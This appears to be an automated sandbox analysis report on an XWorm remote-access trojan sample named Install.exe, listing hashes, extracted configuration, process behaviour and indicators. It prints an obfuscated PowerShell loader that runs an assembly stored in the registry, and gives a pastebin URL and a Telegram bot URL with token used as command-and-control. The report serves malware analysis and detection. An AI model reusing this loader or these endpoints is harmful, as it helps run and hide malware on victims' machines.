Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-12-2024 12:00
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v2004-20241007-en
General
-
Target
Install.exe
-
Size
259KB
-
MD5
28db4677dcbbaa0a4c5adbc02c9da4f3
-
SHA1
e1f0199ed131a90e25204399e4e876da64ea3ba5
-
SHA256
b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
-
SHA512
718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52
-
SSDEEP
6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS
Malware Config
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
ntoskrnl.exe
-
pastebin_url
https://pastebin.com/raw/Zx6DUkf9
-
telegram
https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000f00000001749c-10.dat family_xworm behavioral1/memory/2476-12-0x0000000001320000-0x000000000133C000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2548 created 428 2548 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 2 IoCs
pid Process 2816 Install.exe 2476 KrnlSetupSus.exe -
pid Process 2548 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2548 set thread context of 2256 2548 powershell.EXE 35 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c014e9ce1f4edb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2548 powershell.EXE 2548 powershell.EXE 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe 2256 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2476 KrnlSetupSus.exe Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2256 dllhost.exe Token: SeAuditPrivilege 872 svchost.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2816 2780 Install.exe 30 PID 2780 wrote to memory of 2476 2780 Install.exe 31 PID 2780 wrote to memory of 2476 2780 Install.exe 31 PID 2780 wrote to memory of 2476 2780 Install.exe 31 PID 2804 wrote to memory of 2548 2804 taskeng.exe 33 PID 2804 wrote to memory of 2548 2804 taskeng.exe 33 PID 2804 wrote to memory of 2548 2804 taskeng.exe 33 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2548 wrote to memory of 2256 2548 powershell.EXE 35 PID 2256 wrote to memory of 428 2256 dllhost.exe 5 PID 2256 wrote to memory of 472 2256 dllhost.exe 6 PID 2256 wrote to memory of 488 2256 dllhost.exe 7 PID 2256 wrote to memory of 496 2256 dllhost.exe 8 PID 2256 wrote to memory of 604 2256 dllhost.exe 9 PID 2256 wrote to memory of 688 2256 dllhost.exe 10 PID 2256 wrote to memory of 760 2256 dllhost.exe 11 PID 2256 wrote to memory of 832 2256 dllhost.exe 12 PID 2256 wrote to memory of 872 2256 dllhost.exe 13 PID 2256 wrote to memory of 976 2256 dllhost.exe 15 PID 2256 wrote to memory of 292 2256 dllhost.exe 16 PID 2256 wrote to memory of 1060 2256 dllhost.exe 17 PID 2256 wrote to memory of 1068 2256 dllhost.exe 18 PID 2256 wrote to memory of 1116 2256 dllhost.exe 19 PID 2256 wrote to memory of 1148 2256 dllhost.exe 20 PID 2256 wrote to memory of 1180 2256 dllhost.exe 21 PID 2256 wrote to memory of 1248 2256 dllhost.exe 23 PID 2256 wrote to memory of 1516 2256 dllhost.exe 24 PID 2256 wrote to memory of 808 2256 dllhost.exe 25 PID 2256 wrote to memory of 3024 2256 dllhost.exe 26 PID 2256 wrote to memory of 2520 2256 dllhost.exe 27 PID 2256 wrote to memory of 2476 2256 dllhost.exe 31 PID 2256 wrote to memory of 2804 2256 dllhost.exe 32 PID 2256 wrote to memory of 2548 2256 dllhost.exe 33 PID 2256 wrote to memory of 2556 2256 dllhost.exe 34
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{46aabffe-6c3c-4a8a-b8de-152b22aa5203}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1248
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:808
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:688
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:832
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1116
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:872 -
C:\Windows\system32\taskeng.exetaskeng.exe {8AD3C138-69CC-4169-AC89-41221F50EEDA} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:292
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1060
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1068
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1148
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1516
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:3024
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2520
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\ProgramData\Install.exe"C:\ProgramData\Install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\ProgramData\KrnlSetupSus.exe"C:\ProgramData\KrnlSetupSus.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "411634670769012180-9945174621076244156-1708637318877458642-1920068509424622011"1⤵PID:2556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5b5f6c9ac3389f5e61b4c750cf950e27c
SHA1dbe0cca47ab36938ed022311f97736fc2915ff06
SHA256bd4062e261a7ac5893e95a88d79564b44aad58ca446c3649a50589415b64d098
SHA512014f187b94012f0a5077908107a7b0f3c7efae9edf1a6ea7c395e387830e2fe84105a12ea8446311e0fc25fbe2790f56b614c9726507a22fee7baa46b2c4487c
-
Filesize
85KB
MD56435792d63be630506eb9eebbd1e3878
SHA137f7023b735b3f8cd65803bc704ad529f896ff4a
SHA256dc4f64ba228c5d301a8d64bd8c172b45779583375d3c1be3c83c3cd1c7d2a5e3
SHA51288af5a007d8d21b057740f42ebea3c4fe529924637b2c6b027ed520905ee8445f6b70d7a069457f82134e2c4405b0641f7620adccd8abb1c2ca1dd62cd127955